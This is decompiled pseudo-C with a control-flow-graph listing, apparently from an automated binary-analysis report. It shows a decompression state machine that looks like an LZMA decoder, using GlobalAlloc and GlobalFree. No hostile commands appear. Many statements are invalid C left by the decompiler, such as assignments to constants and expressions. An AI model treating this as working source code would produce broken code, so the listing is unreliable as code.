                                                                                  control_flow_graph 624 406d5f-406d64 625 406dd5-406df3 624->625 626 406d66-406d95 624->626 627 4073cb-4073e0 625->627 628 406d97-406d9a 626->628 629 406d9c-406da0 626->629 630 4073e2-4073f8 627->630 631 4073fa-407410 627->631 632 406dac-406daf 628->632 633 406da2-406da6 629->633 634 406da8 629->634 635 407413-40741a 630->635 631->635 636 406db1-406dba 632->636 637 406dcd-406dd0 632->637 633->632 634->632 641 407441-40744d 635->641 642 40741c-407420 635->642 638 406dbc 636->638 639 406dbf-406dcb 636->639 640 406fa2-406fc0 637->640 638->639 643 406e35-406e63 639->643 647 406fc2-406fd6 640->647 648 406fd8-406fea 640->648 650 406be3-406bec 641->650 644 407426-40743e 642->644 645 4075cf-4075d9 642->645 651 406e65-406e7d 643->651 652 406e7f-406e99 643->652 644->641 649 4075e5-4075f8 645->649 653 406fed-406ff7 647->653 648->653 657 4075fd-407601 649->657 654 406bf2 650->654 655 4075fa 650->655 656 406e9c-406ea6 651->656 652->656 658 406ff9 653->658 659 406f9a-406fa0 653->659 661 406bf9-406bfd 654->661 662 406d39-406d5a 654->662 663 406c9e-406ca2 654->663 664 406d0e-406d12 654->664 655->657 666 406eac 656->666 667 406e1d-406e23 656->667 675 407581-40758b 658->675 676 406f7f-406f97 658->676 659->640 665 406f3e-406f48 659->665 661->649 668 406c03-406c10 661->668 662->627 677 406ca8-406cc1 663->677 678 40754e-407558 663->678 669 406d18-406d2c 664->669 670 40755d-407567 664->670 671 40758d-407597 665->671 672 406f4e-407117 665->672 683 406e02-406e1a 666->683 684 407569-407573 666->684 673 406ed6-406edc 667->673 674 406e29-406e2f 667->674 668->655 682 406c16-406c5c 668->682 685 406d2f-406d37 669->685 670->649 671->649 672->650 680 406f3a 673->680 681 406ede-406efc 673->681 674->643 674->680 675->649 676->659 687 406cc4-406cc8 677->687 678->649 680->665 688 406f14-406f26 681->688 689 406efe-406f12 681->689 690 406c84-406c86 682->690 691 406c5e-406c62 682->691 683->667 684->649 685->662 685->664 687->663 692 406cca-406cd0 687->692 695 406f29-406f33 688->695 689->695 698 406c94-406c9c 690->698 699 406c88-406c92 690->699 696 406c64-406c67 GlobalFree 691->696 697 406c6d-406c7b GlobalAlloc 691->697 693 406cd2-406cd9 692->693 694 406cfa-406d0c 692->694 700 406ce4-406cf4 GlobalAlloc 693->700 701 406cdb-406cde GlobalFree 693->701 694->685 695->673 702 406f35 695->702 696->697 697->655 703 406c81 697->703 698->687 699->698 699->699 700->655 700->694 701->700 705 407575-40757f 702->705 706 406ebb-406ed3 702->706 703->690 705->649 706->673
                                                                                  C-Code - Quality: 98%
                                                                                  			E00406D5F() {
                                                                                  				unsigned short _t531;
                                                                                  				signed int _t532;
                                                                                  				void _t533;
                                                                                  				void* _t534;
                                                                                  				signed int _t535;
                                                                                  				signed int _t565;
                                                                                  				signed int _t568;
                                                                                  				signed int _t590;
                                                                                  				signed int* _t607;
                                                                                  				void* _t614;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					if( *(_t614 - 0x40) != 0) {
                                                                                  						 *(_t614 - 0x34) = 1;
                                                                                  						 *(_t614 - 0x84) = 7;
                                                                                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                  						L132:
                                                                                  						 *(_t614 - 0x54) = _t607;
                                                                                  						L133:
                                                                                  						_t531 =  *_t607;
                                                                                  						_t590 = _t531 & 0x0000ffff;
                                                                                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                  						if( *(_t614 - 0xc) >= _t565) {
                                                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                  							 *(_t614 - 0x40) = 1;
                                                                                  							_t532 = _t531 - (_t531 >> 5);
                                                                                  							 *_t607 = _t532;
                                                                                  						} else {
                                                                                  							 *(_t614 - 0x10) = _t565;
                                                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                  						}
                                                                                  						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                  							L139:
                                                                                  							_t533 =  *(_t614 - 0x84);
                                                                                  							L140:
                                                                                  							 *(_t614 - 0x88) = _t533;
                                                                                  							goto L1;
                                                                                  						} else {
                                                                                  							L137:
                                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                                  								 *(_t614 - 0x88) = 5;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                  							goto L139;
                                                                                  						}
                                                                                  					} else {
                                                                                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  						__esi =  *(__ebp - 0x60);
                                                                                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  						__ecx =  *(__ebp - 0x3c);
                                                                                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  						__ecx =  *(__ebp - 4);
                                                                                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  						if( *(__ebp - 0x38) >= 4) {
                                                                                  							if( *(__ebp - 0x38) >= 0xa) {
                                                                                  								_t97 = __ebp - 0x38;
                                                                                  								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  							}
                                                                                  						} else {
                                                                                  							 *(__ebp - 0x38) = 0;
                                                                                  						}
                                                                                  						if( *(__ebp - 0x34) == __edx) {
                                                                                  							__ebx = 0;
                                                                                  							__ebx = 1;
                                                                                  							L60:
                                                                                  							__eax =  *(__ebp - 0x58);
                                                                                  							__edx = __ebx + __ebx;
                                                                                  							__ecx =  *(__ebp - 0x10);
                                                                                  							__esi = __edx + __eax;
                                                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  							__ax =  *__esi;
                                                                                  							 *(__ebp - 0x54) = __esi;
                                                                                  							__edi = __ax & 0x0000ffff;
                                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								_t216 = __edx + 1; // 0x1
                                                                                  								__ebx = _t216;
                                                                                  								__cx = __ax >> 5;
                                                                                  								 *__esi = __ax;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                                  								0x800 = 0x800 - __edi;
                                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  								L59:
                                                                                  								if(__ebx >= 0x100) {
                                                                                  									goto L54;
                                                                                  								}
                                                                                  								goto L60;
                                                                                  							} else {
                                                                                  								L57:
                                                                                  								if( *(__ebp - 0x6c) == 0) {
                                                                                  									 *(__ebp - 0x88) = 0xf;
                                                                                  									goto L170;
                                                                                  								}
                                                                                  								__ecx =  *(__ebp - 0x70);
                                                                                  								__eax =  *(__ebp - 0xc);
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  								_t202 = __ebp - 0x70;
                                                                                  								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  								goto L59;
                                                                                  							}
                                                                                  						} else {
                                                                                  							__eax =  *(__ebp - 0x14);
                                                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 8);
                                                                                  							__ebx = 0;
                                                                                  							__ebx = 1;
                                                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  							L40:
                                                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  							__ecx =  *(__ebp - 0x58);
                                                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  							 *(__ebp - 0x48) = __eax;
                                                                                  							__eax = __eax + 1;
                                                                                  							__eax = __eax << 8;
                                                                                  							__eax = __eax + __ebx;
                                                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  							__ax =  *__esi;
                                                                                  							 *(__ebp - 0x54) = __esi;
                                                                                  							__edx = __ax & 0x0000ffff;
                                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								 *(__ebp - 0x40) = 1;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__ebx = __ebx + __ebx + 1;
                                                                                  								 *__esi = __ax;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                                  								0x800 = 0x800 - __edx;
                                                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  								L38:
                                                                                  								__eax =  *(__ebp - 0x40);
                                                                                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  									while(1) {
                                                                                  										if(__ebx >= 0x100) {
                                                                                  											break;
                                                                                  										}
                                                                                  										__eax =  *(__ebp - 0x58);
                                                                                  										__edx = __ebx + __ebx;
                                                                                  										__ecx =  *(__ebp - 0x10);
                                                                                  										__esi = __edx + __eax;
                                                                                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  										__ax =  *__esi;
                                                                                  										 *(__ebp - 0x54) = __esi;
                                                                                  										__edi = __ax & 0x0000ffff;
                                                                                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  										if( *(__ebp - 0xc) >= __ecx) {
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  											__cx = __ax;
                                                                                  											_t169 = __edx + 1; // 0x1
                                                                                  											__ebx = _t169;
                                                                                  											__cx = __ax >> 5;
                                                                                  											 *__esi = __ax;
                                                                                  										} else {
                                                                                  											 *(__ebp - 0x10) = __ecx;
                                                                                  											0x800 = 0x800 - __edi;
                                                                                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  											__ebx = __ebx + __ebx;
                                                                                  											 *__esi = __cx;
                                                                                  										}
                                                                                  										 *(__ebp - 0x44) = __ebx;
                                                                                  										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                  											L45:
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t155 = __ebp - 0x70;
                                                                                  											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  										}
                                                                                  									}
                                                                                  									L53:
                                                                                  									_t172 = __ebp - 0x34;
                                                                                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  									L54:
                                                                                  									__al =  *(__ebp - 0x44);
                                                                                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  									L55:
                                                                                  									if( *(__ebp - 0x64) == 0) {
                                                                                  										 *(__ebp - 0x88) = 0x1a;
                                                                                  										goto L170;
                                                                                  									}
                                                                                  									__ecx =  *(__ebp - 0x68);
                                                                                  									__al =  *(__ebp - 0x5c);
                                                                                  									__edx =  *(__ebp - 8);
                                                                                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  									 *( *(__ebp - 0x68)) = __al;
                                                                                  									__ecx =  *(__ebp - 0x14);
                                                                                  									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                  									__eax = __ecx + 1;
                                                                                  									__edx = 0;
                                                                                  									_t191 = __eax %  *(__ebp - 0x74);
                                                                                  									__eax = __eax /  *(__ebp - 0x74);
                                                                                  									__edx = _t191;
                                                                                  									L79:
                                                                                  									 *(__ebp - 0x14) = __edx;
                                                                                  									L80:
                                                                                  									 *(__ebp - 0x88) = 2;
                                                                                  									goto L1;
                                                                                  								}
                                                                                  								if(__ebx >= 0x100) {
                                                                                  									goto L53;
                                                                                  								}
                                                                                  								goto L40;
                                                                                  							} else {
                                                                                  								L36:
                                                                                  								if( *(__ebp - 0x6c) == 0) {
                                                                                  									 *(__ebp - 0x88) = 0xd;
                                                                                  									L170:
                                                                                  									_t568 = 0x22;
                                                                                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                  									_t535 = 0;
                                                                                  									L172:
                                                                                  									return _t535;
                                                                                  								}
                                                                                  								__ecx =  *(__ebp - 0x70);
                                                                                  								__eax =  *(__ebp - 0xc);
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  								_t121 = __ebp - 0x70;
                                                                                  								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  								goto L38;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					L1:
                                                                                  					_t534 =  *(_t614 - 0x88);
                                                                                  					if(_t534 > 0x1c) {
                                                                                  						L171:
                                                                                  						_t535 = _t534 | 0xffffffff;
                                                                                  						goto L172;
                                                                                  					}
                                                                                  					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                  						case 0:
                                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                  							_t534 =  *( *(_t614 - 0x70));
                                                                                  							if(_t534 > 0xe1) {
                                                                                  								goto L171;
                                                                                  							}
                                                                                  							_t538 = _t534 & 0x000000ff;
                                                                                  							_push(0x2d);
                                                                                  							asm("cdq");
                                                                                  							_pop(_t570);
                                                                                  							_push(9);
                                                                                  							_pop(_t571);
                                                                                  							_t610 = _t538 / _t570;
                                                                                  							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                  							asm("cdq");
                                                                                  							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                  							 *(_t614 - 0x3c) = _t605;
                                                                                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                  								L10:
                                                                                  								if(_t613 == 0) {
                                                                                  									L12:
                                                                                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                  									goto L15;
                                                                                  								} else {
                                                                                  									goto L11;
                                                                                  								}
                                                                                  								do {
                                                                                  									L11:
                                                                                  									_t613 = _t613 - 1;
                                                                                  									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                  								} while (_t613 != 0);
                                                                                  								goto L12;
                                                                                  							}
                                                                                  							if( *(_t614 - 4) != 0) {
                                                                                  								GlobalFree( *(_t614 - 4));
                                                                                  							}
                                                                                  							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  							 *(_t614 - 4) = _t534;
                                                                                  							if(_t534 == 0) {
                                                                                  								goto L171;
                                                                                  							} else {
                                                                                  								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                  								goto L10;
                                                                                  							}
                                                                                  						case 1:
                                                                                  							L13:
                                                                                  							__eflags =  *(_t614 - 0x6c);
                                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                                  								 *(_t614 - 0x88) = 1;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                  							_t45 = _t614 - 0x48;
                                                                                  							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                  							__eflags =  *_t45;
                                                                                  							L15:
                                                                                  							if( *(_t614 - 0x48) < 4) {
                                                                                  								goto L13;
                                                                                  							}
                                                                                  							_t546 =  *(_t614 - 0x40);
                                                                                  							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                  								L20:
                                                                                  								 *(_t614 - 0x48) = 5;
                                                                                  								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							 *(_t614 - 0x74) = _t546;
                                                                                  							if( *(_t614 - 8) != 0) {
                                                                                  								GlobalFree( *(_t614 - 8));
                                                                                  							}
                                                                                  							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                  							 *(_t614 - 8) = _t534;
                                                                                  							if(_t534 == 0) {
                                                                                  								goto L171;
                                                                                  							} else {
                                                                                  								goto L20;
                                                                                  							}
                                                                                  						case 2:
                                                                                  							L24:
                                                                                  							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                  							 *(_t614 - 0x84) = 6;
                                                                                  							 *(_t614 - 0x4c) = _t553;
                                                                                  							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                  							goto L132;
                                                                                  						case 3:
                                                                                  							L21:
                                                                                  							__eflags =  *(_t614 - 0x6c);
                                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                                  								 *(_t614 - 0x88) = 3;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                  							_t67 = _t614 - 0x70;
                                                                                  							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                  							__eflags =  *_t67;
                                                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                  							L23:
                                                                                  							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                  							if( *(_t614 - 0x48) != 0) {
                                                                                  								goto L21;
                                                                                  							}
                                                                                  							goto L24;
                                                                                  						case 4:
                                                                                  							goto L133;
                                                                                  						case 5:
                                                                                  							goto L137;
                                                                                  						case 6:
                                                                                  							goto L0;
                                                                                  						case 7:
                                                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                                                  							if( *(__ebp - 0x40) != 1) {
                                                                                  								__eax =  *(__ebp - 0x24);
                                                                                  								 *(__ebp - 0x80) = 0x16;
                                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  								__eax =  *(__ebp - 0x28);
                                                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  								__eax =  *(__ebp - 0x2c);
                                                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  								__eax = 0;
                                                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  								__al = __al & 0x000000fd;
                                                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                                                  								__eflags = __eax;
                                                                                  								 *(__ebp - 0x58) = __eax;
                                                                                  								goto L68;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 4);
                                                                                  							__ecx =  *(__ebp - 0x38);
                                                                                  							 *(__ebp - 0x84) = 8;
                                                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                  							goto L132;
                                                                                  						case 8:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__ecx =  *(__ebp - 0x38);
                                                                                  								 *(__ebp - 0x84) = 0xa;
                                                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                  							} else {
                                                                                  								__eax =  *(__ebp - 0x38);
                                                                                  								__ecx =  *(__ebp - 4);
                                                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                  								 *(__ebp - 0x84) = 9;
                                                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                  							}
                                                                                  							goto L132;
                                                                                  						case 9:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								goto L89;
                                                                                  							}
                                                                                  							__eflags =  *(__ebp - 0x60);
                                                                                  							if( *(__ebp - 0x60) == 0) {
                                                                                  								goto L171;
                                                                                  							}
                                                                                  							__eax = 0;
                                                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                                                  							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  							__eflags = _t258;
                                                                                  							0 | _t258 = _t258 + _t258 + 9;
                                                                                  							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                  							goto L75;
                                                                                  						case 0xa:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__ecx =  *(__ebp - 0x38);
                                                                                  								 *(__ebp - 0x84) = 0xb;
                                                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                  								goto L132;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x28);
                                                                                  							goto L88;
                                                                                  						case 0xb:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__ecx =  *(__ebp - 0x24);
                                                                                  								__eax =  *(__ebp - 0x20);
                                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  							} else {
                                                                                  								__eax =  *(__ebp - 0x24);
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x28);
                                                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  							L88:
                                                                                  							__ecx =  *(__ebp - 0x2c);
                                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  							L89:
                                                                                  							__eax =  *(__ebp - 4);
                                                                                  							 *(__ebp - 0x80) = 0x15;
                                                                                  							__eax =  *(__ebp - 4) + 0xa68;
                                                                                  							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                  							goto L68;
                                                                                  						case 0xc:
                                                                                  							L99:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0xc;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t334 = __ebp - 0x70;
                                                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t334;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							__eax =  *(__ebp - 0x2c);
                                                                                  							goto L101;
                                                                                  						case 0xd:
                                                                                  							goto L36;
                                                                                  						case 0xe:
                                                                                  							goto L45;
                                                                                  						case 0xf:
                                                                                  							goto L57;
                                                                                  						case 0x10:
                                                                                  							L109:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0x10;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t365 = __ebp - 0x70;
                                                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t365;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							goto L111;
